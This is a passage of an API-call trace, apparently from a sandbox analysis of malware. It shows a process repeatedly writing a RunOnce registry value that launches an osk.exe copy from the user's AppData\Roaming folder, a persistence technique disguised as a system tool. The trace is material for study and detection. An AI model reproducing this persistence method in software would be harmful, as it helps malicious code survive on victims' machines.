lpMsg=0x33f7fc) returned 1 [0084.932] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.932] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.932] KillTimer (hWnd=0x20280, uIDEvent=0x218b) returned 1 [0084.932] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.934] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.934] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.934] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.934] RegCloseKey (hKey=0x280) returned 0x0 [0084.934] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.934] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.935] SetTimer (hWnd=0x20280, nIDEvent=0x218c, uElapse=0xa, lpTimerFunc=0x0) returned 0x218c [0084.935] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.948] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.948] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.948] KillTimer (hWnd=0x20280, uIDEvent=0x218c) returned 1 [0084.948] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.949] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.949] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.949] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.949] RegCloseKey (hKey=0x280) returned 0x0 [0084.949] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.949] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.949] SetTimer (hWnd=0x20280, nIDEvent=0x218d, uElapse=0xa, lpTimerFunc=0x0) returned 0x218d [0084.950] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.964] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.964] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.964] KillTimer (hWnd=0x20280, uIDEvent=0x218d) returned 1 [0084.964] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.965] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.965] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.965] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.965] RegCloseKey (hKey=0x280) returned 0x0 [0084.965] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.965] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.965] SetTimer (hWnd=0x20280, nIDEvent=0x218e, uElapse=0xa, lpTimerFunc=0x0) returned 0x218e [0084.966] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.979] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.979] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.980] KillTimer (hWnd=0x20280, uIDEvent=0x218e) returned 1 [0084.980] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.980] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.980] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.981] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.981] RegCloseKey (hKey=0x280) returned 0x0 [0084.981] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.981] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.981] SetTimer (hWnd=0x20280, nIDEvent=0x218f, uElapse=0xa, lpTimerFunc=0x0) returned 0x218f [0084.981] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.994] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.994] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.994] KillTimer (hWnd=0x20280, uIDEvent=0x218f) returned 1 [0084.995] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.995] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.995] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.995] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.996] RegCloseKey (hKey=0x280) returned 0x0 [0084.996] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.996] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.996] SetTimer (hWnd=0x20280, nIDEvent=0x2190, uElapse=0xa, lpTimerFunc=0x0) returned 0x2190 [0084.996] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.010] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.010] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.010] KillTimer (hWnd=0x20280, uIDEvent=0x2190) returned 1 [0085.010] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.011] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.011] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.011] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.011] RegCloseKey (hKey=0x280) returned 0x0 [0085.011] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.011] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.011] SetTimer (hWnd=0x20280, nIDEvent=0x2191, uElapse=0xa, lpTimerFunc=0x0) returned 0x2191 [0085.012] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.025] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.025] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.026] KillTimer (hWnd=0x20280, 
uIDEvent=0x2191) returned 1 [0085.026] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.026] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.026] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.027] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.027] RegCloseKey (hKey=0x280) returned 0x0 [0085.027] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.027] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.027] SetTimer (hWnd=0x20280, nIDEvent=0x2192, uElapse=0xa, lpTimerFunc=0x0) returned 0x2192 [0085.027] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.041] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.041] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.041] KillTimer (hWnd=0x20280, uIDEvent=0x2192) returned 1 [0085.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.042] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.042] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.042] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.043] RegCloseKey (hKey=0x280) returned 0x0 [0085.043] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.043] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.043] SetTimer (hWnd=0x20280, nIDEvent=0x2193, uElapse=0xa, lpTimerFunc=0x0) returned 0x2193 [0085.043] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.057] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.057] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.057] KillTimer (hWnd=0x20280, uIDEvent=0x2193) returned 1 [0085.057] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.057] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.058] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.058] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.058] RegCloseKey (hKey=0x280) returned 0x0 [0085.058] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.058] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.058] SetTimer (hWnd=0x20280, nIDEvent=0x2194, uElapse=0xa, lpTimerFunc=0x0) returned 0x2194 [0085.058] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.074] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.074] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.074] KillTimer (hWnd=0x20280, uIDEvent=0x2194) returned 1 [0085.074] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0085.075] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.075] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.075] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.075] RegCloseKey (hKey=0x280) returned 0x0 [0085.075] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.075] SetTimer (hWnd=0x20280, nIDEvent=0x2195, uElapse=0xa, lpTimerFunc=0x0) returned 0x2195 [0085.075] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.088] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.088] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.088] KillTimer (hWnd=0x20280, uIDEvent=0x2195) returned 1 [0085.088] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.089] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.089] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.089] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.089] RegCloseKey (hKey=0x280) returned 0x0 
[0085.089] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.089] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.089] SetTimer (hWnd=0x20280, nIDEvent=0x2196, uElapse=0xa, lpTimerFunc=0x0) returned 0x2196 [0085.089] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.103] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.103] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.104] KillTimer (hWnd=0x20280, uIDEvent=0x2196) returned 1 [0085.104] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.104] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.104] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.105] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.105] RegCloseKey (hKey=0x280) returned 0x0 [0085.105] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.105] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.105] SetTimer (hWnd=0x20280, nIDEvent=0x2197, uElapse=0xa, lpTimerFunc=0x0) returned 0x2197 [0085.105] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.119] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.119] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.119] KillTimer (hWnd=0x20280, uIDEvent=0x2197) returned 1 [0085.120] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.120] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.120] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.120] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.121] RegCloseKey (hKey=0x280) returned 0x0 [0085.121] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.121] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.121] SetTimer (hWnd=0x20280, nIDEvent=0x2198, uElapse=0xa, lpTimerFunc=0x0) returned 0x2198 [0085.121] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.135] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.135] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.135] KillTimer (hWnd=0x20280, uIDEvent=0x2198) returned 1 [0085.135] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.136] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.136] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.136] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.136] RegCloseKey (hKey=0x280) returned 0x0 [0085.136] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.137] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.137] SetTimer (hWnd=0x20280, nIDEvent=0x2199, uElapse=0xa, lpTimerFunc=0x0) returned 0x2199 [0085.137] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.166] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.166] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.167] KillTimer (hWnd=0x20280, uIDEvent=0x2199) returned 1 [0085.167] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.167] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.167] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.168] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.168] RegCloseKey (hKey=0x280) returned 0x0 [0085.168] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.168] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.168] SetTimer (hWnd=0x20280, nIDEvent=0x219a, uElapse=0xa, lpTimerFunc=0x0) returned 0x219a [0085.168] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.181] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.181] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.182] KillTimer (hWnd=0x20280, uIDEvent=0x219a) returned 1 [0085.182] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.182] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.183] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.183] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.183] RegCloseKey (hKey=0x280) returned 0x0 [0085.183] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.183] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.183] SetTimer (hWnd=0x20280, nIDEvent=0x219b, uElapse=0xa, lpTimerFunc=0x0) returned 0x219b [0085.183] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.197] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.197] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.197] KillTimer (hWnd=0x20280, uIDEvent=0x219b) returned 1 [0085.197] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.198] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.198] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.198] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.198] RegCloseKey (hKey=0x280) returned 0x0 [0085.198] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.199] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0085.199] SetTimer (hWnd=0x20280, nIDEvent=0x219c, uElapse=0xa, lpTimerFunc=0x0) returned 0x219c [0085.199] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.213] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.213] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.213] KillTimer (hWnd=0x20280, uIDEvent=0x219c) returned 1 [0085.213] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.214] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.214] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.214] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.214] RegCloseKey (hKey=0x280) returned 0x0 [0085.214] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.214] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.214] SetTimer (hWnd=0x20280, nIDEvent=0x219d, uElapse=0xa, lpTimerFunc=0x0) returned 0x219d [0085.215] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.230] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.230] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.230] KillTimer (hWnd=0x20280, uIDEvent=0x219d) returned 1 [0085.230] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.231] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.231] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
